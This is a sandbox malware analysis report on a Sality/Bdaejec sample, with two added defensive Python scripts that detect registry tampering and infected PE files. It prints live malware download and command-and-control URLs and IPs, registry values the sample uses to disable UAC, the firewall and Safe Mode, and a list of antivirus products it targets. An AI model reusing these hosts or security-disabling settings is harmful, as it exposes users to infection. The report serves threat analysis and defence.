Windows Analysis Report
1.0.0.2.exe

Overview

General Information

Sample name: 1.0.0.2.exe
Analysis ID: 1467981
MD5: ad809738e208d99a28009023546bc695
SHA1: 3326e4971b5b23122dac680dfb9eb41df0692267
SHA256: 775939b8bf22ee4999cebd8d9e1525ca9417464b5fe6ed1778f0a7b43d07d6ef
Tags: exe, sality

Detection

Bdaejec, Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Bdaejec
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file contains section with special chars
PE file has a writeable .text section
Uses known network protocols on non-standard ports
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara signature match
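Several of the signatures above (Changes security center settings, Disables UAC (registry), Deletes keys which are related to windows safe boot, Modifies the windows firewall and its notification settings) correspond to registry value names that also appear in the sample's memory strings in the Spreading section. The Python below is an added example, not code from Joe Sandbox or from this report: it checks the text of a `reg export` of the relevant keys against stock Windows defaults and reports every deviation, so the same check can be run offline against a triage collection. The value names are those the report cites; the expected default values and the two export texts are assumptions constructed for the example.

```python
"""Offline check of a 'reg export' for the tampering the sandbox signatures
describe (Security Center notifications, EnableLUA, SafeBoot keys, firewall).

Added example.  Value names come from the report's signatures and from the
strings in the sample's memory; the expected values are stock Windows
defaults and are an assumption.  The export texts are constructed, not
taken from an infected host.
"""
import re

SECCENTER = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center"
UAC_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
FW_STD = (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess"
          r"\Parameters\FirewallPolicy\StandardProfile")

# (key, value name, expected dword) -- assumption: Windows defaults
EXPECTED = [
    (SECCENTER, "AntiVirusDisableNotify", 0),
    (SECCENTER, "FirewallDisableNotify", 0),
    (SECCENTER, "UpdatesDisableNotify", 0),
    (SECCENTER, "UacDisableNotify", 0),
    (SECCENTER, "AntiVirusOverride", 0),
    (SECCENTER, "FirewallOverride", 0),
    (UAC_KEY, "EnableLUA", 1),
    (FW_STD, "EnableFirewall", 1),
    (FW_STD, "DisableNotifications", 0),
]
# Keys Sality deletes to break Safe Mode; they must be present.
REQUIRED_KEYS = [
    r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal",
    r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network",
]

KEY_RE = re.compile(r"^\[(.+)\]$")
DWORD_RE = re.compile(r'^"([^"]+)"=dword:([0-9a-fA-F]{8})$')


def parse_reg_export(text: str) -> dict:
    """Return {key: {value_name: int}} for dword values (other types ignored)."""
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        m = KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = DWORD_RE.match(line)
        if m and current is not None:
            keys[current][m.group(1)] = int(m.group(2), 16)
    return keys


def find_tampering(text: str) -> list:
    """List every value that deviates from EXPECTED and every REQUIRED_KEY that is gone."""
    keys = parse_reg_export(text)
    findings = []
    for key, name, want in EXPECTED:
        got = keys.get(key, {}).get(name)
        if got is not None and got != want:
            findings.append(f"{key}\\{name} = {got} (expected {want})")
    for key in REQUIRED_KEYS:
        if key not in keys:
            findings.append(f"missing key {key} (Safe Mode boot broken)")
    return findings


# Constructed export: Security Center notifications and UAC switched off,
# firewall notifications disabled, SafeBoot\Minimal deleted.
TAMPERED_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify"=dword:00000001
"FirewallDisableNotify"=dword:00000001
"UpdatesDisableNotify"=dword:00000001
"UacDisableNotify"=dword:00000001
"AntiVirusOverride"=dword:00000001
"FirewallOverride"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"EnableFirewall"=dword:00000001
"DisableNotifications"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network]
"AlternateShell"="cmd.exe"
"""

# Constructed export of a host with defaults in place.
CLEAN_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"EnableLUA"=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network]
"""

if __name__ == "__main__":
    for label, text in (("clean", CLEAN_EXPORT), ("tampered", TAMPERED_EXPORT)):
        print(label, *find_tampering(text), sep="\n  ")
```

Values that are absent from the export are not reported, so export the keys listed in EXPECTED and REQUIRED_KEYS explicitly rather than relying on a partial dump; a missing Security Center value is normal on a host where the value was never set, whereas a missing SafeBoot key is not.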

Classification

Name: Sality

Description: F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, keeping it an active and relevant threat despite its age. Modern Sality variants can also communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) for other malicious actions, such as attacking routers.

Infection: Sality viruses typically infect executable files on local, shared and removable drives. Earlier variants simply added their own code to the end of the infected (host) file, i.e. they are appending infectors. The viral code Sality inserts is polymorphic: it is re-encoded on each infection so that no two infected files carry the same byte sequence, which defeats simple signature matching and makes analysis more difficult. Earlier variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence. Rather than redirecting the PE entry point, the virus patches a jump somewhere in the middle of the host's existing code, so the host starts normally and control passes to the viral code only when execution reaches the patched instruction. This makes both discovery and disinfection of the malicious code harder.

Payload: Once installed, Sality viruses usually also execute a malicious payload. The specific actions depend on the variant, but generally Sality will attempt to terminate processes, particularly those belonging to security products. The virus may also open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.

Attribution: Salty Spider

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sality

AV Detection

Source: 1.0.0.2.exe Avira: detected
Source: http://amsamex.com/xs.jpg Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg?5059c3=10531718 Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg Avira URL Cloud: Label: malware
Source: http://a3inforservice.com.br/images/logof.gif Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rars Avira URL Cloud: Label: phishing
Source: http://www.klkjwre9fqwieluoi.info/ Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?51fbda=483560101 Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?ce2fff=94588921 Avira URL Cloud: Label: malware
Source: http://accnet.ca/xs.jpg Avira URL Cloud: Label: malware
Source: http://ahmediye.net/xs.jpg Avira URL Cloud: Label: malware
Source: http://kukutrustnet777888.info/DisableTaskMgrSoftware Avira URL Cloud: Label: phishing
Source: http://althawry.org/images/xs.jpg Avira URL Cloud: Label: malware
Source: http://accnet.ca/xs.jpghttp://a3inforservice.com.br/images/logof.gif Avira URL Cloud: Label: malware
Source: http://apple-pie.in/images/xs.jpg Avira URL Cloud: Label: phishing
Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010a Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?ce2fff=945889216 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310T Avira URL Cloud: Label: malware
Source: http://kukutrustnet987.info/home.gif Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar9 Avira URL Cloud: Label: malware
Source: http://ampyazilim.com.tr/images/xs2.jpg Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar6 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar4 Avira URL Cloud: Label: malware
Source: http://173.193.19.14/logo.gif Avira URL Cloud: Label: malware
Source: http://kukutrustnet888.info/home.gif Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310C Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarL Avira URL Cloud: Label: malware
Source: http://kukutrustnet777.info/home.gif Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?c12b4b=126595310 Avira URL Cloud: Label: malware
Source: http://apple-pie.in/images/xs.jpg?ce2fff=121614327 Avira URL Cloud: Label: phishing
Source: http://apple-pie.in/images/xs.jpg?554c8c=39131092 Avira URL Cloud: Label: phishing
Source: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif Avira URL Cloud: Label: malware
Source: http://amsamex.com/xs.jpg?549590=27716560 Avira URL Cloud: Label: malware
Source: http://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers Avira URL Cloud: Label: malware
Source: http://arthur.niria.biz/xs.jpg?51fbda=48356010 Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net/ Avira URL Cloud: Label: malware
Source: http://g2.arrowhitech.com/xs.jpg Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarp Avira URL Cloud: Label: malware
Source: http://kukutrustnet777888.info/ Avira URL Cloud: Label: phishing
Source: http://89.119.67.154/testo5/ Avira URL Cloud: Label: malware
Source: http://www.careerdesk.org/images/xs.jpg?ad5654=34079484 Avira URL Cloud: Label: malware
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\iuepn.exe Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe Avira: detection malicious, Label: W32/Sality.AT
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: www.careerdesk.org Virustotal: Detection: 11% Perma Link
Source: ddos.dnsnb8.net Virustotal: Detection: 11% Perma Link
Source: apple-pie.in Virustotal: Detection: 13% Perma Link
Source: arthur.niria.biz Virustotal: Detection: 10% Perma Link
Source: ahmediye.net Virustotal: Detection: 9% Perma Link
Source: amsamex.com Virustotal: Detection: 8% Perma Link
Source: althawry.org Virustotal: Detection: 11% Perma Link
Source: http://www.careerdesk.org/images/xs.jpg Virustotal: Detection: 9% Perma Link
Source: http://amsamex.com/xs.jpg Virustotal: Detection: 9% Perma Link
Source: http://www.klkjwre9fqwieluoi.info/ Virustotal: Detection: 10% Perma Link
Source: http://arthur.niria.biz/xs.jpg Virustotal: Detection: 10% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rars Virustotal: Detection: 11% Perma Link
Source: http://ahmediye.net/xs.jpg Virustotal: Detection: 10% Perma Link
Source: http://kukutrustnet777888.info/DisableTaskMgrSoftware Virustotal: Detection: 14% Perma Link
Source: http://accnet.ca/xs.jpg Virustotal: Detection: 8% Perma Link
Source: http://althawry.org/images/xs.jpghttp://www.careerdesk.org/images/xs.jpghttp://arthur.niria.biz/xs.j Virustotal: Detection: 6% Perma Link
Source: http://althawry.org/images/xs.jpg Virustotal: Detection: 9% Perma Link
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe ReversingLabs: Detection: 100%
Source: C:\Users\user\Desktop\VF.dll ReversingLabs: Detection: 26%
Source: 1.0.0.2.exe Virustotal: Detection: 86% Perma Link
Source: Submitted Sample Integrated Neural Analysis Model: Matched 99.7% probability
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\iuepn.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\winmefmb.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: 1.0.0.2.exe Joe Sandbox ML: detected
Source: 1.0.0.2.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

Spreading

Source: Yara match File source: 0.2.1.0.0.2.exe.2b60000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 1.0.0.2.exe PID: 5352, type: MEMORYSTR
Source: C:\Users\user\Desktop\1.0.0.2.exe File created: C:\autorun.inf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: 1.0.0.2.exe, 00000000.00000003.2255038602.000000000760A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\autorun.inf_
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000760A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\autorun.inf_
Source: 1.0.0.2.exe, 00000000.00000003.2255260627.0000000001165000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000003.2255294960.000000000761C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\autorun.inf
Source: 1.0.0.2.exe, 00000000.00000002.2266190166.000000000117B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: [AutoRun]
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: autorun.inf
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: _kkiuynbvnbrev406C:\hh8geqpHJTkdns0MCIDRV_VERMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)MPRNtQuerySystemInformationSoftware\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache GlobalUserOfflineSoftware\Microsoft\Windows\CurrentVersion\Internet SettingsSoftware\Microsoft\Windows\CurrentVersionhttp://www.klkjwre9fqwieluoi.info/amsint32.sysGetSystemDirectoryAdrivers\KeServiceDescriptorTable_os%d%dhttp://kukutrustnet777888.info/DisableTaskMgrSoftware\Microsoft\Windows\CurrentVersion\policies\systemEnableLUASoftware\Microsoft\Windows\ShellNoRoam\MUICachemonga_bongapurity_control_90833SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile%s:*:Enabled:ipsecSYSTEM\CurrentControlSet\Services\SharedAccessStart\AuthorizedApplications\ListSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedHidden[AutoRun]
Source: 1.0.0.2.exe, 00000000.00000002.2266402880.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: shell\explore\Commandshell\Autoplay\commandDisableRegistryToolsDAEMON.Simple Poly user v1.1a(c) Sector\SvcSOFTWARE\Microsoft\Security CenterAntiVirusOverrideAntiVirusDisableNotifyFirewallDisableNotifyFirewallOverrideUpdatesDisableNotifyUacDisableNotifyAntiSpywareOverrideSYSTEMkukutrusted!.CreateMutexAKERNEL32TEXTUPXCODEGdiPlus.dllDEVICEMBhttp://\Runhttpipfltdrv.syswww.microsoft.com?%x=%d&%x=%dSYSTEM.INIUSER32.DLL.%c%s\\.\amsint32.EXE.SCRSfcIsFileProtectedsfcdrw.VDB.AVCNTDLL.DLLrnd=autorun.infEnableFirewallDoNotAllowExceptionsDisableNotificationsWNetEnumResourceAWNetOpenEnumAWNetCloseEnumADVAPI32.DLLCreateServiceAOpenSCManagerAOpenServiceACloseServiceHandleDeleteServiceControlService__hStartServiceANOTICE__drIPFILTERDRIVERChangeServiceConfigAwin%s.exe%s.exeWININET.DLLInternetOpenAInternetReadFileInternetOpenUrlAInternetCloseHandleAVPAgnitum Client Security ServiceALGAmon monitoraswUpdSvaswMon2aswRdraswSPaswTdiaswFsBlkacssrvAV useravast! iAVS4 Control Serviceavast! Antivirusavast! Mail Scanneravast! Web Scanneravast! Asynchronous Virus Monitoravast! 
Self ProtectionAVG E-mail ScannerAvira AntiVir Premium GuardAvira AntiVir Premium WebGuardAvira AntiVir Premium MailGuardBGLiveSvcBlackICECAISafeccEvtMgrccProxyccSetMgrCOMODO Firewall Pro Sandbox DrivercmdGuardcmdAgentEset ServiceEset HTTP ServerEset Personal FirewallF-Prot Antivirus Update MonitorfsbwsysFSDFWDF-Secure Gatekeeper Handler StarterFSMAGoogle Online ServicesInoRPCInoRTInoTaskISSVCKPF4KLIFLavasoftFirewallLIVESRVMcAfeeFrameworkMcShieldMcTaskManagerMpsSvcnavapsvcNOD32krnNPFMntorNSCServiceOutpost Firewall main moduleOutpostFirewallPAVFIRESPAVFNSVRPavProtPavPrSrvPAVSRVPcCtlComPersonalFirewalPREVSRVProtoPort Firewall servicePSIMSVCRapAppSharedAccessSmcServiceSNDSrvcSPBBCSvcSpIDer FS Monitor for Windows NTSpIDer Guard File System MonitorSPIDERNTSymantec Core LCSymantec Password ValidationSymantec AntiVirus Definition WatcherSavRoamSymantec AntiVirusTmntsrvTmPfwUmxAgentUmxCfgUmxLUUmxPolvsmonVSSERVWebrootDesktopFirewallDataServiceWebrootFirewallwscsvcXCOMMSystem\CurrentControlSet\Control\SafeBoot%d%d.tmpSOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList%s\%s%s\Software\Microsoft\Windows\CurrentVersion\Ext\StatsSoftware\Microsoft\Windows\CurrentVersion\Ext\StatsSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper ObjectsKERNEL32.DLLbootshellSYSTEM.INIExplorer.exeAVPM.A2GUARDA2CMD.A2SERVICE.A2FREEAVASTADVCHK.AGB.AKRNL.AHPROCMONSERVER.AIRDEFENSEALERTSVCAVIRAAMON.TROJAN.AVZ.ANTIVIRAPVXDWIN.ARMOR2NET.ASHAVAST.ASHDISP.ASHENHCD.ASHMAISV.ASHPOPWZ.ASHSERV.ASHSIMPL.ASHSKPCK.ASHWEBSV.ASWUPDSV.ASWSCANAVCIMAN.AVCONSOL.AVuser.AVESVC.AVEVAL.AVEVL32.AVGAMAVGCC.AVGCHSVX.AVGCSRVX.AVGNSX.AVGCC32.AVGCTRL.AVGEMC.AVGFWSRV.AVGNT.AVCENTERAVGNTMGRAVGSERV.AVGTRAY.AVGUARD.AVGUPSVC.AVGWDSVC.AVINITNT.AVKSERV.AVKSERVICE.AVKWCTL.AVP.AVP32.AVPCC.AVASTAVSERVER.AVSCHED32.AVSYNMGR.AVWUPD32.AVWUPSRV.AVXMONITORAVXQUAR.BDSWITCH.BLACKD.BLACKICE.CAFIX.BITDEFENDERCCEVTMGR.CFP.CFPCONFIG.CCSETMGR.CFIAUDIT.CLAMTRAY.CL
Source: 1.0.0.2.exe, 00000000.00000003.2255401629.000000000117A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: autorun.infH
Source: 1.0.0.2.exe, 00000000.00000002.2272180867.000000000522B000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: [autorun]
Source: 1.0.0.2.exe, 00000000.00000002.2273488135.000000000761C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\autorun.inf
Source: autorun.inf.0.dr Binary or memory string: [AutoRun]
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B6BADD Sleep,FindFirstFileA,FindNextFileA,Sleep, 0_2_02B6BADD
Source: C:\Users\user\Desktop\1.0.0.2.exe Code function: 0_2_02B657A0 FindFirstFileA,FindNextFileA,Sleep, 0_2_02B657A0
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 2_2_005B29E2
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe Code function: 2_2_005B2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 2_2_005B2B8C
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\rksowY.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior
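The file-infection evidence above (rksowY.exe writing into SciTE.exe, Uninstall.exe and MyProg.exe, all of which Avira then flags) and the static signatures "PE file has a writeable .text section", "Entry point lies outside standard sections" and "PE file contains section with special chars" can be turned into a quick static triage for other executables on a suspected host. The Python below is an added example, not code from Joe Sandbox or from this report: a standard-library-only PE section-table parser that evaluates those three heuristics. The set of names treated as standard code sections, the characters tolerated in a section name, and the two in-memory PE images it runs against are assumptions constructed for the example. A true EPO infection as described in the Classification keeps the original entry point, so on such a file only the writable-.text and odd-section checks would fire; the entry-point check catches the simpler variant where the viral body is appended and the entry point moved into it.

```python
"""Static PE triage for file-infector symptoms (added example, stdlib only).

Checks three heuristics the sandbox report raises against the sample:
  * a writable .text/CODE section        (IMAGE_SCN_MEM_WRITE set)
  * entry point outside the code section (appended-body infectors)
  * section names with unusual characters
The PE images at the bottom are constructed in memory; they are not the
sample from the report.
"""
import struct

IMAGE_SCN_MEM_WRITE = 0x80000000
CODE_RX = 0x20 | 0x20000000 | 0x40000000      # CNT_CODE | MEM_EXECUTE | MEM_READ
DATA_RW = 0x40 | 0x40000000 | IMAGE_SCN_MEM_WRITE
CODE_SECTION_NAMES = {".text", "CODE"}        # assumption: what counts as a standard code section
NAME_EXTRA_CHARS = "._$"                      # assumption: non-alphanumerics tolerated in names
DOS_MAGIC, PE_MAGIC = b"MZ", b"PE\0\0"


def parse_sections(data: bytes):
    """Return (entry_point_rva, [(name, va, vsize, characteristics), ...])."""
    if data[:2] != DOS_MAGIC:
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_MAGIC:
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    nsections, opt_size = struct.unpack_from("<H12xH", data, coff + 2)
    opt = coff + 20
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]   # AddressOfEntryPoint (PE32 and PE32+)
    table = opt + opt_size
    sections = []
    for i in range(nsections):
        name, vsize, va, _rsize, _rptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", data, table + i * 40)
        sections.append((name.rstrip(b"\0").decode("latin-1"), va, vsize, chars))
    return entry_rva, sections


def section_for_rva(sections, rva):
    for name, va, vsize, _chars in sections:
        if va <= rva < va + max(vsize, 1):
            return name
    return None


def infector_indicators(data: bytes) -> list:
    """Return indicator strings; an empty list means none of the heuristics fired."""
    entry_rva, sections = parse_sections(data)
    hits = []
    for name, _va, _vsize, chars in sections:
        if name in CODE_SECTION_NAMES and chars & IMAGE_SCN_MEM_WRITE:
            hits.append(f"writable code section {name!r}")
        if not all(c.isalnum() or c in NAME_EXTRA_CHARS for c in name):
            hits.append(f"section name with special chars {name!r}")
    ep_sec = section_for_rva(sections, entry_rva)
    if ep_sec not in CODE_SECTION_NAMES:
        hits.append(f"entry point 0x{entry_rva:x} in section {ep_sec!r}, not a code section")
    return hits


def scan_file(path: str) -> list:
    with open(path, "rb") as fh:
        return infector_indicators(fh.read())


def build_pe(sections, entry_rva) -> bytes:
    """Build a minimal headers-only PE32 image (constructed test data)."""
    e_lfanew = 0x40
    dos = DOS_MAGIC + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)     # AddressOfEntryPoint
    table = b"".join(
        struct.pack("<8sIIIIIIHHI", name.encode("latin-1").ljust(8, b"\0"),
                    vsize, va, vsize, 0, 0, 0, 0, 0, chars)
        for name, va, vsize, chars in sections)
    return dos + PE_MAGIC + coff + bytes(opt) + table


CLEAN_PE = build_pe([(".text", 0x1000, 0x2000, CODE_RX),
                     (".data", 0x3000, 0x1000, DATA_RW)], 0x1200)

# Looks like an infected host: .text made writable, a trailing section with an
# odd name, and the entry point moved into that trailing section.
INFECTED_PE = build_pe([(".text", 0x1000, 0x2000, CODE_RX | IMAGE_SCN_MEM_WRITE),
                        (".data", 0x3000, 0x1000, DATA_RW),
                        ("kq&#1", 0x4000, 0x800, CODE_RX | IMAGE_SCN_MEM_WRITE)], 0x4010)

if __name__ == "__main__":
    for label, img in (("clean", CLEAN_PE), ("infected-looking", INFECTED_PE)):
        print(label, infector_indicators(img))
```

On a real host, run `scan_file` over Program Files and removable drives rather than over a single file: Sality's infection routine enumerates whole trees (the FindFirstFileA/FindNextFileA loops and the per-drive threads spawned from GetLogicalDriveStringsA above), so one hit usually means many. Packed but legitimate binaries also have non-standard section names and writable code, so treat a single indicator as a prompt to hash and look the file up, not as a verdict.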

Networking

Source: Traffic Snort IDS: 2838522 ETPRO TROJAN Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup 192.168.2.6:63363 -> 1.1.1.1:53
Source: Traffic Snort IDS: 2807908 ETPRO TROJAN Backdoor.Win32/Bdaejec.A Checkin 192.168.2.6:49710 -> 44.221.84.105:799
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49712 -> 54.244.188.177:80
Source: Traffic Snort IDS: 2804830 ETPRO TROJAN Win32.Sality.bh Checkin 2 192.168.2.6:49715 -> 44.221.84.105:80
